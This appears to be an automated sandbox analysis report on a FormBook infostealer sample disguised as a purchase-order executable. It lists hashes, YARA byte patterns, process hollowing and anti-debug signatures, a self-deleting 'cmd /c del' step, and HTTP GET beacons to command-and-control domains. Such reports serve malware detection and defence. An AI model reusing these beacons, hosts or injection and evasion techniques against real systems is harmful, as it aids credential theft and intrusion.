Analysis Report PO8479349743085.exe

Overview

General Information

Sample Name: PO8479349743085.exe
Analysis ID: 299748
MD5: ed96c254e53b9d7a33827da32e02d513
SHA1: 5c074c70293c77c4d1409facdc930de69070917d
SHA256: 92625b5d11e691107b8aa2e733c1be9fe3677b5a86f03e08f239bf6e0d450885
Tags: exe, Formbook

Most interesting Screenshot:

Detection

Malware family: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO8479349743085.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\PO8479349743085.exe' MD5: ED96C254E53B9D7A33827DA32E02D513)
    • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO8479349743085.exe (PID: 2412 cmdline: C:\Users\user\Desktop\PO8479349743085.exe MD5: ED96C254E53B9D7A33827DA32E02D513)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6972 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4912 cmdline: /c del 'C:\Users\user\Desktop\PO8479349743085.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
4.2.PO8479349743085.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.PO8479349743085.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.PO8479349743085.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
4.2.PO8479349743085.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.PO8479349743085.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: PO8479349743085.exe | ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PO8479349743085.exe | Joe Sandbox ML: detected
Source: 4.2.PO8479349743085.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 0_2_00862535 FindFirstFileExW,0_2_00862535
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00862535 FindFirstFileExW,4_2_00862535
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4x nop then pop edi | 4_2_0041502C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 4x nop then pop edi | 14_2_0306502C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49744
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49748
Source: global traffic | HTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=0JNaWD+vE3WAKhUwjj+TKeKuqytbEj/rGf7L+MsFdzHuvdvProgHb0a/NNpWXL1yVbSl HTTP/1.1 | Host: www.bottrader.digital | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?nbWlB=BeM5oIWdPTJOiFnjQO+IqBO/neltk2vktJQt+Ph2cW5xLg9JehTbyWJpLiwdZ9hJan65&C8blf=NdndnTqh HTTP/1.1 | Host: www.jerseycoastcollectibles.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=hDlxEqga3BcFycAw+Ryjn8fIDSDvAlpACarbBMYBexJf7I8708/imcYQGcjEnGSvwPkN HTTP/1.1 | Host: www.talayer.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?nbWlB=LF/+HPnAhfbCOGMevCy5LeffOdBaHMczRS15DZo0qD0NchnlxbNeb0leR6j20NPT7waA&C8blf=NdndnTqh HTTP/1.1 | Host: www.citizen10.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?C8blf=NdndnTqh&nbWlB=ulW4hg8UHoOCNCMZObeLzGLAYISMMUrPq5Lyb801GJDl4BJ6h+xiXEGVrq4k7hgZjF5Q HTTP/1.1 | Host: www.matu-edu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /d8h/?nbWlB=uz3DzrbHiMvht9e3OTxEc/Gw23kb4NUduvWFYO5nDH9JvfbAptXw1jORji9I2x8XS1KH&C8blf=NdndnTqh HTTP/1.1 | Host: www.hendieboards.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: CHINA169-BACKBONECHINAUNICOMChina169BackboneCN
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: DREAMHOST-ASUS
Source: unknown | DNS traffic detected: queries for: www.treehaire.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 18 Oct 2020 06:45:10 GMT | Server: Apache | Content-Length: 277 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6a 65 72 73 65 79 63 6f 61 73 74 63 6f 6c 6c 65 63 74 69 62 6c 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.jerseycoastcollectibles.com Port 80</address></body></html>
Source: explorer.exe, 00000007.00000000.290655420.000000000F640000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000007.00000000.288217541.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO8479349743085.exe, 00000000.00000002.262955804.00000000012EA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417B90 NtCreateFile,4_2_00417B90
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417C40 NtReadFile,4_2_00417C40
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417CC0 NtClose,4_2_00417CC0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417D70 NtAllocateVirtualMemory,4_2_00417D70
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417B8B NtCreateFile,4_2_00417B8B
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417CBA NtReadFile,4_2_00417CBA
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_00417D6C NtAllocateVirtualMemory,4_2_00417D6C
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01329910
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013299A0 NtCreateSection,LdrInitializeThunk,4_2_013299A0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329860 NtQuerySystemInformation,LdrInitializeThunk,4_2_01329860
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329840 NtDelayExecution,LdrInitializeThunk,4_2_01329840
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013298F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_013298F0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329A20 NtResumeThread,LdrInitializeThunk,4_2_01329A20
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01329A00
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329A50 NtCreateFile,LdrInitializeThunk,4_2_01329A50
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329540 NtReadFile,LdrInitializeThunk,4_2_01329540
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013295D0 NtClose,LdrInitializeThunk,4_2_013295D0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329710 NtQueryInformationToken,LdrInitializeThunk,4_2_01329710
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013297A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_013297A0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329780 NtMapViewOfSection,LdrInitializeThunk,4_2_01329780
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329FE0 NtCreateMutant,LdrInitializeThunk,4_2_01329FE0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01329660
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013296E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_013296E0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329950 NtQueueApcThread,4_2_01329950
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013299D0 NtCreateProcessEx,4_2_013299D0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329820 NtEnumerateKey,4_2_01329820
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0132B040 NtSuspendThread,4_2_0132B040
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013298A0 NtWriteVirtualMemory,4_2_013298A0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329B00 NtSetValueKey,4_2_01329B00
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0132A3B0 NtGetContextThread,4_2_0132A3B0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329A10 NtQuerySection,4_2_01329A10
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329A80 NtOpenDirectoryObject,4_2_01329A80
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0132AD30 NtSetContextThread,4_2_0132AD30
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329520 NtWaitForSingleObject,4_2_01329520
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329560 NtWriteFile,4_2_01329560
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013295F0 NtQueryInformationFile,4_2_013295F0
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329730 NtQueryVirtualMemory,4_2_01329730
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0132A710 NtOpenProcessToken,4_2_0132A710
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329770 NtSetInformationFile,4_2_01329770
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_0132A770 NtOpenThread,4_2_0132A770
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329760 NtOpenProcess,4_2_01329760
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329610 NtEnumerateValueKey,4_2_01329610
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329670 NtQueryInformationProcess,4_2_01329670
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_01329650 NtQueryValueKey,4_2_01329650
Source: C:\Users\user\Desktop\PO8479349743085.exe | Code function: 4_2_013296D0 NtCreateKey,4_2_013296D0
